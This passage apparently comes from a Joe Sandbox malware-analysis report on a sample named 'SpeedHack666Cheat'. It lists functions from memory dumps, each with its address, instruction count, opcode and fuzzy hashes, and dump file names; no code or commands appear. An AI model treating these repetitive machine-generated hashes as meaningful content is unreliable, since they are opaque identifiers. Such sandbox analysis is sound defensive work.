Opcode Fuzzy Hash: 777413719e2d007e59745ca02f452a7009123b2c4ba89641fe23ec4a191e44bb
Instruction Fuzzy Hash: C1212F74919246DBEB00EFB4E94836EB7F1FF40305F5084E9E90697350DF749A04AB66

Function 00B50006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864279af4d7d9ed120d8bf351a1b45cea80d974c4490b2caa3590e7470caeeb
Instruction ID: e2838af82cdcb9be4fab342510511662de078b66aaef845fd95f5ab41fe060ef
Opcode Fuzzy Hash: 5864279af4d7d9ed120d8bf351a1b45cea80d974c4490b2caa3590e7470caeeb
Instruction Fuzzy Hash: B00149A640E7C05FE713AB78A8746827FB52E13218B4E80CBC2C5CF2A7D1485959C3A6

Function 00A305E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501333331.0000000000A30000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a408f712b9295b5ba3271e36d001520f3f9f9246c93fd0ede883105d414cced
Instruction ID: a9462774d3c3c642a8358cb2c47fda56d3bf4126033bef1ab97bfc18ce1aedaa
Opcode Fuzzy Hash: 3a408f712b9295b5ba3271e36d001520f3f9f9246c93fd0ede883105d414cced
Instruction Fuzzy Hash: A70162B65093806FD712CF06AC40862BFE8EA86620709859FED498B652D225A908CB72

Function 04A510E3 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82f8f2803ccbcae02bcc0ab47f1a971d236eb014bed4ef056e7465c09f39409
Instruction ID: 8fd9da415f32b4ad6773393306f143a8b0d500ccc185898f86310a74c1934a40
Opcode Fuzzy Hash: c82f8f2803ccbcae02bcc0ab47f1a971d236eb014bed4ef056e7465c09f39409
Instruction Fuzzy Hash: 1B012D74F082048BDB54DF65CA483AD7AF1AB44305F1048AAAC09A33A0EF346986DF01

Function 04A51DFF Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd90dff9b7d135637f5f91156d056a8c16fe45ef7aedf054566872866752c70
Instruction ID: 8298356123b378ba1f92d65e5dd8dd0e3b6a0b736aa07dc91ffafa1bd0a9acad
Opcode Fuzzy Hash: fbd90dff9b7d135637f5f91156d056a8c16fe45ef7aedf054566872866752c70
Instruction Fuzzy Hash: D4016D74F082448FEB149B64DA187BD7AF1AB44304F4048AAAD06A73E0EF346D85DF01

Function 00B5206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb6b6891001fa78eb87506dbb128f6b477b75c23c4958b8081fecef6267b056
Instruction ID: 125abe6286af75615ae01daf1f77b5333a71e539e4810c7cff533c140c907e0c
Opcode Fuzzy Hash: 2cb6b6891001fa78eb87506dbb128f6b477b75c23c4958b8081fecef6267b056
Instruction Fuzzy Hash: C7F04974A09254CBCB589B24DCA876CB3F1BB84B02F14C0E9D94693390CE758F88CF80

Function 00B56D38 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7837446617276189a7083325139c25508b0666b98468996f486147b20e65c6
Instruction ID: 153a957bd6849d1d39b10c4ac7637f706ec7856f3475315fe6d50a19e3b2954b
Opcode Fuzzy Hash: ad7837446617276189a7083325139c25508b0666b98468996f486147b20e65c6
Instruction Fuzzy Hash: 59F0A030B08248AFDB219774A80D7A97BE8EB85B09F4085E9D906873D2DFB55E089712

Function 00B51704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b7d96d87deb779681a1af3b19b77e77b699164eeb75a3fc517346b3f3926e2
Instruction ID: 9650c4798211fde3287921d37ab55117e694f16c07e7ded64d1ca7f6b7f3fa5f
Opcode Fuzzy Hash: 74b7d96d87deb779681a1af3b19b77e77b699164eeb75a3fc517346b3f3926e2
Instruction Fuzzy Hash: 14F0F9B4A0A159CBDB149F24DD987ACB7F1BB88702F04C4E5D90A92390DE748A48DF40

Function 00A30606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501333331.0000000000A30000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b94691bfa1900209865300a9150eb8e5d820c95b14071be5ea7f8f7b53d8a47
Instruction ID: 7dbd2403a93715e709faa36d2fb349d0ed4699b391e1bf11a5f70be323ff15b7
Opcode Fuzzy Hash: 8b94691bfa1900209865300a9150eb8e5d820c95b14071be5ea7f8f7b53d8a47
Instruction Fuzzy Hash: 0EE092B66046004B9650CF0BEC41452F7D8EB88630708C07FDD0D8B711E675B904CAA5

Function 00B515D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c857c31952a970cc5c734ec1a6d0a9cf3d9b3c522d755409cb64a697a20257
Instruction ID: 07971d4211ed924f486d777b4d9e7b5cd814a81c269380f86b75f1bb3cf5b475
Opcode Fuzzy Hash: f7c857c31952a970cc5c734ec1a6d0a9cf3d9b3c522d755409cb64a697a20257
Instruction Fuzzy Hash: 780132B4D04629DFCB64CF14CD80BD9B7B5AB49205F0081E69A4DA3311E7315E89DF59

Function 00B56D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46597ec3b2f3c645f7dd1b4261f98b25ef08815cb64c96e3d9fe1bb3909b2e62
Instruction ID: 4d3a6dc18a4016ca75b323fa37433716d7d061cb9e4cf6cdac42dd54bcf572b9
Opcode Fuzzy Hash: 46597ec3b2f3c645f7dd1b4261f98b25ef08815cb64c96e3d9fe1bb3909b2e62
Instruction Fuzzy Hash: 8BF0E530B082089BCB24A770A80C36877E9EB84B11F4084F8DD02833C1DF755E44A711

Function 00B52E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fde1c41b9ad4cf26944e1f88422eef54ac59bd9d59faaa076ca2f6a09511e34
Instruction ID: 0a72aa7390370f90a2bba2c390a4efd4ccf32210c83df767778139400d4e6ded
Opcode Fuzzy Hash: 0fde1c41b9ad4cf26944e1f88422eef54ac59bd9d59faaa076ca2f6a09511e34
Instruction Fuzzy Hash: 5EE08C71A08251DFEB146F60DC2876D73E4AB08712F0880FAAC4AD3380DA388E449F61

Function 00B53A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0dfbc5ed5f38b8e8055ff08068c1e7f0e6bc750ccf941a61df6947eb83b9851
Instruction ID: 3237d9a978f33e5393bc4a56adf1ded92eb1b256acb065fd63b9e1eba0980868
Opcode Fuzzy Hash: e0dfbc5ed5f38b8e8055ff08068c1e7f0e6bc750ccf941a61df6947eb83b9851
Instruction Fuzzy Hash: 73E0C2316145A4CBE7505B18C92435C33E0AB0E353F1880E6EC06DB381CB758D448B96

Function 009723F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490644976.0000000000972000.00000040.00000800.00020000.00000000.sdmp, Offset: 00972000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_972000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d057e000c51601a0d321c8675736e7f0747483321d01dc3997f584bb7d3814b
Instruction ID: cd6a8b766a911758ab18780fbd534b4aacc0335959b91e0a9ad9ecc28750f793
Opcode Fuzzy Hash: 1d057e000c51601a0d321c8675736e7f0747483321d01dc3997f584bb7d3814b
Instruction Fuzzy Hash: BED05E7A2196818FE7169B1CC1A4B9537D8AB51714F4A84F9A8448B773C768D9C1D600

Function 009723BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1490644976.0000000000972000.00000040.00000800.00020000.00000000.sdmp, Offset: 00972000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_972000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf14fc8cba644425dd2dfb8fb73c2ae8c5d9df5a872a0f2466640be53dda329
Instruction ID: b06f1b6590870a687aaa3b9cb8a12282227100691fc85846d9eb752ce5e790ed
Opcode Fuzzy Hash: cdf14fc8cba644425dd2dfb8fb73c2ae8c5d9df5a872a0f2466640be53dda329
Instruction Fuzzy Hash: 29D05E356056814BDB15DB0CC2D4F5933D8AB44B14F0684ECAC108B262C7A8D8C0CA00

Function 00B56AA8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d9b26d729fd442a3b1ecfaf570de8fb053dd20d254658e7e1fb199bc8d0a70
Instruction ID: 9577327073d30a6f1803d1a86bc7e4b5650e7745228c5b9a2a1eee8ba644996a
Opcode Fuzzy Hash: 95d9b26d729fd442a3b1ecfaf570de8fb053dd20d254658e7e1fb199bc8d0a70
Instruction Fuzzy Hash: 85D09279108144EFCB028F68E898F993FA4BF5A355F044199F8999B622C2729924EB16

Function 04A523D0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d14137e1e90c1b602a0c371f1e03d25dbf16bf747ecbb48b9f9c583c2243066
Instruction ID: 3c5d82f70f8145afc0883aaba7a06885d9ebd79a49d659443ccdce2eb716a024
Opcode Fuzzy Hash: 4d14137e1e90c1b602a0c371f1e03d25dbf16bf747ecbb48b9f9c583c2243066
Instruction Fuzzy Hash: F0D0C73554D384AFCB028B609815CE97FF45F57310F05809AF5C54A5A2D2B25455DB12

Function 04A523B0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5f888f4eda63771130c76db2cb9477a5f06e126f82aa8a666c16e1140f8e46
Instruction ID: 8a9f60f806df2d6bd64dba3453b5a9aa10eddfbbfbb1212b12d0e417e0703a89
Opcode Fuzzy Hash: 9b5f888f4eda63771130c76db2cb9477a5f06e126f82aa8a666c16e1140f8e46
Instruction Fuzzy Hash: 71C04C16C893982ED74182B434516D82F950656064B5A41EAC8CDE7A93E4950D855642

Function 04A50EE1 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159a8309c13f25511ef109037b224049a677e1f9cb222e985599fb1a94ded717
Instruction ID: 35b95a7485ab3aef743869bf6922efa1e88184a44522623515f738436491391a
Opcode Fuzzy Hash: 159a8309c13f25511ef109037b224049a677e1f9cb222e985599fb1a94ded717
Instruction Fuzzy Hash: 1EC012B28AE3C80FDB0307602CA80C83F30883301039D00CFD08AC69B3E244000AC722

Function 04A50EC0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd17cc99db68c1ce26a10b3fb76cbbc5f0aa56db62cd853dd74cbd94f58615c
Instruction ID: 73e491347c9931541a189a71e401d57ff448f475a3be1f4312f84e8be8e8cc72
Opcode Fuzzy Hash: 5fd17cc99db68c1ce26a10b3fb76cbbc5f0aa56db62cd853dd74cbd94f58615c
Instruction Fuzzy Hash: F4C08C6145C3845FDB1083B81890BC82B400B22018F05008AC48417623D2C142168B21

Function 00B56C39 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a83bb08a9cc6411e7ab6182e7445e9dae3b7fb01b3db8e280faf5b8522ae1ab
Instruction ID: 42ac367bde7f71ec6c5d6143a33c44335f4c96b2f9b7865b9b8067c7a8f5595f
Opcode Fuzzy Hash: 8a83bb08a9cc6411e7ab6182e7445e9dae3b7fb01b3db8e280faf5b8522ae1ab
Instruction Fuzzy Hash: F4C08CB804C1801FC701832DA8E1F067BAC3B06109F410089E00D93513C6508820CA14

Function 00B56998 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34efb1d47c02d243ab07b3fff0e3247ba9b301493e0d6290d25399478b198df5
Instruction ID: caa8559382591ff485d355ea3d2aa825bff329d176c480d6ef9b8e632cbad3d4
Opcode Fuzzy Hash: 34efb1d47c02d243ab07b3fff0e3247ba9b301493e0d6290d25399478b198df5
Instruction Fuzzy Hash: A0D01270108180DFC301D73CD454F943BE0BF15245F8501DDE049DB923C32254218B01

Function 04A52459 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d6c39a775f851b79b40f3126b6634b415d0614313ac5a9544348e8c48742e0
Instruction ID: 6f5f4bc239a973f580ff296ea2f5b4914defeb0164f2321a87041228af2021e6
Opcode Fuzzy Hash: 10d6c39a775f851b79b40f3126b6634b415d0614313ac5a9544348e8c48742e0
Instruction Fuzzy Hash: D4C02B3E60C3880FC701473890407C47F511F5223DF04009ED04D4F383D1994C06CB12

Function 00B56CD8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bd8829601ac0f8ab265c2f884b26a94dac46b379ca34eb185d10ca60bee202
Instruction ID: 89dfc6beb0fcaefcfc0af757aef7b4cb9e90206fc3e4cc696d36adec82a5b679
Opcode Fuzzy Hash: d8bd8829601ac0f8ab265c2f884b26a94dac46b379ca34eb185d10ca60bee202
Instruction Fuzzy Hash: B7C04C1924E6C58BD712A7647C513887BA46F81701F99049A98855226BC54C456FC71B

Function 00B56AB8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b294f4b2c48518cfeedeba3b9af9ab744c2084e4f4ed62b4c78870d39f2145
Instruction ID: ae8d11fc871b69cf8a317df25c21c8a0faa538be261ceed2a03d50c433cd20f9
Opcode Fuzzy Hash: 03b294f4b2c48518cfeedeba3b9af9ab744c2084e4f4ed62b4c78870d39f2145
Instruction Fuzzy Hash: A2C04C35100208AFCB015F55D404D957FA9EF55260F008061F9484A521C67295249B51

Function 04A523E0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b294f4b2c48518cfeedeba3b9af9ab744c2084e4f4ed62b4c78870d39f2145
Instruction ID: ae8d11fc871b69cf8a317df25c21c8a0faa538be261ceed2a03d50c433cd20f9
Opcode Fuzzy Hash: 03b294f4b2c48518cfeedeba3b9af9ab744c2084e4f4ed62b4c78870d39f2145
Instruction Fuzzy Hash: A2C04C35100208AFCB015F55D404D957FA9EF55260F008061F9484A521C67295249B51

Function 00B5F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db9030253da975a37e1c801203dafaa0ec00466978b3c711861ac99e3f94168a
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: db9030253da975a37e1c801203dafaa0ec00466978b3c711861ac99e3f94168a
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 00B52FCD Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ed5038872fe6b0822b44743ea162977c5c80a6a179a155ae53a09e5d7d309a
Instruction ID: 9d9f2b80fbf2120685fa7dd853e3fb494316929c774d9a6fc968ee38c90072a8
Opcode Fuzzy Hash: 25ed5038872fe6b0822b44743ea162977c5c80a6a179a155ae53a09e5d7d309a
Instruction Fuzzy Hash: D3C00239919128DFCB188B00DE85FD8BBB2AB48711F1581D09A0963361C7319E809F52

Function 04A5098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da14babd43ab8aa17011c1f6528ab6b651a42a5eef30c0083efeea611517b529
Instruction ID: 56eefaec21918118b0724b8b0f6ca559c6f075924c63f572f47f9c474a21c121
Opcode Fuzzy Hash: da14babd43ab8aa17011c1f6528ab6b651a42a5eef30c0083efeea611517b529
Instruction Fuzzy Hash: 3DC04C70E0A2048BDB44AFB0D11839D7AF1AB54301F90446995069B3A5DA381444DB11

Function 04A5057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6acc286e528a081a0775e7faa9dbc70e5f5d0f3c8e23e56deff694a09a2a14c
Instruction ID: c1719b50ce8f61ae33dc42a6ffd9a4a3ef6efe73f575b0e3f9cd992c4b34e26b
Opcode Fuzzy Hash: d6acc286e528a081a0775e7faa9dbc70e5f5d0f3c8e23e56deff694a09a2a14c
Instruction Fuzzy Hash: BBC04C70E4A2048BEB94AFB0911879C7BF1AB54301F90446D9506973A5DE3819489F51

Function 00B569A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 00B5A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d8313102205129d49ece5e6ac806a63ef31004f419857d8f4576190b1b9645
Instruction ID: c1dbb6c34ec4a32d2157180475537cf89b87bc93408358fd2f82b7dfa1115846
Opcode Fuzzy Hash: 24d8313102205129d49ece5e6ac806a63ef31004f419857d8f4576190b1b9645
Instruction Fuzzy Hash: 74A02230008A0C8B808033E8380B28EBBAC8C802033C000E0B80C022030FA0A8080AA2

Function 00B5F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b74d3a3cd11949af1b9ed44cd9b9fd36a38f877f10ce7b12821fb966e07d64
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 08b74d3a3cd11949af1b9ed44cd9b9fd36a38f877f10ce7b12821fb966e07d64
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 00B5E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a971f5d068ed3e81b72ba2b5eb8b440d534918bcefc14840dad2f1892edc7420
Instruction ID: ac7734b31eaba3fe9baf286669904b9dd391b72c365a8c39f292626c543c281e
Opcode Fuzzy Hash: a971f5d068ed3e81b72ba2b5eb8b440d534918bcefc14840dad2f1892edc7420
Instruction Fuzzy Hash: F990027116860C8F45802795B909555B75C95449157804061B50D416115E6565105795

Function 00B56C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34adf83ee10589da70a317d5d55df21a338f0b0d2060cebd378e843e26329fc
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: b34adf83ee10589da70a317d5d55df21a338f0b0d2060cebd378e843e26329fc
Instruction Fuzzy Hash:

Function 00B5EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb478ac368fcfd76919649b08b11cfea97fd4b94d7be59c288100ea94cedc1f7
Instruction ID: 70c1878553f4bdfa590e5ff5a76b1f0eca8b6695c03b29713f5dfaf13687279e
Opcode Fuzzy Hash: cb478ac368fcfd76919649b08b11cfea97fd4b94d7be59c288100ea94cedc1f7
Instruction Fuzzy Hash: 3C90023245870D8B45542B957C099A6775CD544D267C10052A51D416115E65645056E9

Function 00B5F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ffa552d077c15a96e3ce358f140c7eb505e71c65b9b281a8fbe8695f247181f
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: 4ffa552d077c15a96e3ce358f140c7eb505e71c65b9b281a8fbe8695f247181f
Instruction Fuzzy Hash:

Function 00B5DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
